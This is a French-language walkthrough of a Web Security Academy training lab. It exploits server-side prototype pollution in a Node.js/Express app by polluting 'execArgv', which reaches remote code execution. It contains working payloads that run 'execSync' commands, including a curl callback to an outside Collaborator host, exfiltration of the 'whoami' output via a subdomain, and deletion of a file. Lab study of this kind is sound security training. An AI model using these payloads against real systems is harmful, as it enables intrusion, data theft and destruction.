Exécution de code à distance via pollution de prototype côté serveur

Remote code execution via server-side prototype pollution

Lab: Remote code execution via server-side prototype pollution | Web Security AcademyWebSecAcademy

Contexte du lab

Application basée sur Node.js et le framework Express.
Vulnérabilité : server-side prototype pollution car l’application fusionne de manière non sécurisée une entrée contrôlée par l’utilisateur dans un objet JavaScript côté serveur.
Objectif : polluer Object.prototype afin d’injecter des commandes système qui seront ensuite exécutées par le serveur, puis supprimer /home/carlos/morale.txt.
Connexion fournie : wiener:peter (dans ce lab, on a déjà des privilèges élevés et l’accès aux fonctionnalités admin).

Point d’entrée vulnérable : mise à jour d’adresse

On observe que la fonctionnalité update address accepte un JSON. On peut y inclure une pollution via constructor.prototype (preuve que la fusion est dangereuse) :

{
  "address_line_1": "Wiener HQ",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "bgJz500ntJpShWGP0Lq8QWkZ3nvDb0BX",
  "constructor": {
    "prototype": {
      "test": "false",
      "json spaces": 1
    }
  }
}

Fonctionnalité “gadget” : Maintenance jobs (admin)

En tant qu’admin, on voit un bouton Run maintenance jobs.

Quand on clique, l’application exécute des tâches (ex : cleanup) et affiche :

Database cleanup → succès
Filesystem cleanup → succès

Le client envoie un JSON similaire :

{
  "csrf": "L7LME4ZyzauaCTOU9Nc4P0ZdaHHcCYYO",
  "sessionId": "bgJz500ntJpShWGP0Lq8QWkZ3nvDb0BX",
  "tasks": [
    "db-cleanup",
    "fs-cleanup"
  ]
}

Et le serveur répond avec :

{
  "results": [
    {
      "name": "db-cleanup",
      "description": "Database cleanup",
      "success": true
    },
    {
      "name": "fs-cleanup",
      "description": "Filesystem cleanup",
      "success": true
    }
  ]
}

Observation clé : en arrière-plan, il semble qu’un process Node.js lance ces tâches via un mécanisme du type child_process.

Child process | Node.js v25.7.0 Documentationnodejs.org

Exploitation : injecter des arguments Node via `execArgv`

Dans Node.js, certaines exécutions peuvent passer des arguments au runtime via execArgv. Idée : polluer Object.prototype.execArgv pour injecter un --eval=... qui exécute une commande système via child_process.execSync.

--eval=require('child_process').execSync('id')

Payload utilisé (test de callback vers Burp Collaborator via curl) :

"__proto__": {

    "execArgv":[

        "--eval=require('child_process').execSync('curl https://m2pugey17it1s1cdpbfmc54tuk0co5cu.oastify.com')"

    ]

}

Ensuite, on déclenche Run maintenance jobs pour forcer l’application à lancer le process qui réutilise execArgv.

On reçoit bien une requête sur le Collaborator → exécution confirmée.

Vérification du contexte : exfiltrer `whoami`

On peut exfiltrer le user via un sous-domaine dynamique :

"--eval=require('child_process').execSync('curl https://$(whoami).m2pugey17it1s1cdpbfmc54tuk0co5cu.oastify.com')"

Réception : carlos

Étape finale : suppression du fichier demandé

On envoie une pollution propre avec la commande de suppression :

{
  "address_line_1": "Wiener HQ",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "bgJz500ntJpShWGP0Lq8QWkZ3nvDb0BX",
  "__proto__": {
    "execArgv": [
      "--eval=require('child_process').execSync('rm /home/carlos/morale.txt')"
    ]
  }
}

Puis on relance Maintenance jobs pour déclencher l’exécution.

Résultat attendu : le fichier /home/carlos/morale.txt est supprimé et le lab est validé.

Mis à jour il y a 1 mois

hashtagRemote code execution via server-side prototype pollution

hashtagContexte du lab

hashtagPoint d’entrée vulnérable : mise à jour d’adresse

hashtagFonctionnalité “gadget” : Maintenance jobs (admin)

hashtagExploitation : injecter des arguments Node via execArgv

hashtagVérification du contexte : exfiltrer whoami

hashtagÉtape finale : suppression du fichier demandé